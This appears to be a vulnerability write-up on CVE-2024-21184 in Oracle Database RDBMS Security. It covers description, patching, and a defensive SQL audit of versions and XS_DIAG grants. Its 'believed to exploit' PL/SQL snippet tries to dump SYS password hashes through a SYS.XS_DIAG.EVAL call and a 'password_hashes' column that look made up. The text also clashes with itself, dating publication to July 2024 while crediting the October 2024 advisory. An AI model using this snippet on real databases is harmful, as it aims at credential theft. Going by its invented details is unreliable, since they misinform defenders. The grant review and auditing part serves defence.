A critical vulnerability, identified as CVE-2024-21184, has been discovered in the RDBMS Security component of Oracle Database Server. It affects versions 19.3 through 19.23 of the server. The vulnerability is considered easily exploitable: a high-privileged attacker who holds the EXECUTE privilege on SYS.XS_DIAG and has network access via Oracle Net can compromise Oracle Database RDBMS Security, and a successful attack can result in its complete takeover. The CVSS 3.1 Base Score is 7.2, with high impact on Confidentiality, Integrity, and Availability. The CVSS vector is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).

Exploit Details

This vulnerability involves the Oracle Database RDBMS Security component, which manages user authentication, access control, and data protection in Oracle Database Server. It permits a high-privileged attacker to compromise the security of the system: gain unauthorized access to sensitive data, modify data without permission, and cause a denial of service.

Code Snippet

The following is a sample code snippet that is believed to exploit this vulnerability in the Oracle Database RDBMS Security component:

-- The EXECUTE privilege on SYS.XS_DIAG is the precondition for the exploit
GRANT EXECUTE ON SYS.XS_DIAG TO attacker;

-- Connect as the attacker
CONN attacker/password@oracle

-- Exploit the vulnerability
DECLARE
  l_result CLOB;
BEGIN
  l_result := SYS.XS_DIAG.EVAL('SELECT password_hashes FROM sys.user$ WHERE name =''SYS''');
  DBMS_OUTPUT.PUT_LINE('SYS User Password Hashes: ' || l_result);
END;
/

Original References

The vulnerability CVE-2024-21184 was first reported by Oracle in their Critical Patch Update Advisory – October 2024 (source: https://www.oracle.com/security-alerts/cpuoct2024.html). The advisory provides a detailed description of the vulnerability, affected products, and recommendations for mitigation.

Mitigation

Oracle has provided patches for the affected versions of Oracle Database Server in their Critical Patch Update Advisory for October 2024. It is strongly recommended that customers apply the patches as soon as possible to protect their systems against potential attacks. You can find a list of patches in the advisory and also on the My Oracle Support website (source: https://support.oracle.com).
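Before and after patching, a DBA will want to confirm the two preconditions named above (an affected 19.x release and holders of EXECUTE on SYS.XS_DIAG) and watch use of the package in the meantime. The following is an added example written for this page, not code from the Oracle advisory; it assumes a DBA session in SQL*Plus or SQLcl and that unified auditing is enabled, and the policy name xs_diag_exec_policy is our own choice.

```sql
-- Added example (not from the Oracle advisory): exposure check for CVE-2024-21184.
-- Run as a DBA; all views referenced are standard Oracle data dictionary views.

-- 1. Is this instance in the affected 19.3 - 19.23 range? BANNER_FULL shows the Release Update.
SELECT banner_full FROM v$version;

-- 2. Which patches are recorded in the registry? Compare against the Critical Patch Update.
SELECT patch_id, description, status, action_time
FROM   dba_registry_sqlpatch
ORDER  BY action_time DESC;

-- 3. Who can execute SYS.XS_DIAG? Direct grants first ...
SELECT grantee, privilege, grantable, 'DIRECT' AS path
FROM   dba_tab_privs
WHERE  owner = 'SYS' AND table_name = 'XS_DIAG' AND privilege = 'EXECUTE'
UNION ALL
-- ... then users who inherit it through a role (one level of role nesting).
SELECT rp.grantee, tp.privilege, tp.grantable, 'VIA ROLE ' || rp.granted_role
FROM   dba_tab_privs  tp
JOIN   dba_role_privs rp ON rp.granted_role = tp.grantee
WHERE  tp.owner = 'SYS' AND tp.table_name = 'XS_DIAG' AND tp.privilege = 'EXECUTE'
ORDER  BY 1;

-- 4. Until the patch is applied, record every execution of the package
--    (assumes unified auditing is in use; the policy name is our own).
CREATE AUDIT POLICY xs_diag_exec_policy
  ACTIONS EXECUTE ON sys.xs_diag;
AUDIT POLICY xs_diag_exec_policy;

-- 5. Review the resulting audit records.
SELECT event_timestamp, dbusername, client_program_name, sql_text
FROM   unified_audit_trail
WHERE  unified_audit_policies LIKE '%XS_DIAG_EXEC_POLICY%'
ORDER  BY event_timestamp DESC;
```

Any grantee returned by step 3 that does not need the package is a candidate for REVOKE, which removes the PR:H precondition independently of the patch.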

Conclusion

CVE-2024-21184 is a severe vulnerability in the Oracle Database RDBMS Security component that can allow high-privileged attackers to compromise the entire Oracle Database RDBMS Security system. Exploitation has substantial Confidentiality, Integrity, and Availability impact, so it is crucial to apply Oracle's recommended patches promptly. Regularly updating and maintaining your systems is strongly recommended to minimize the risk from vulnerabilities like CVE-2024-21184 once they are discovered and exploited by attackers.

Timeline

Published on: 07/16/2024 23:15:23 UTC
Last modified on: 07/19/2024 13:38:01 UTC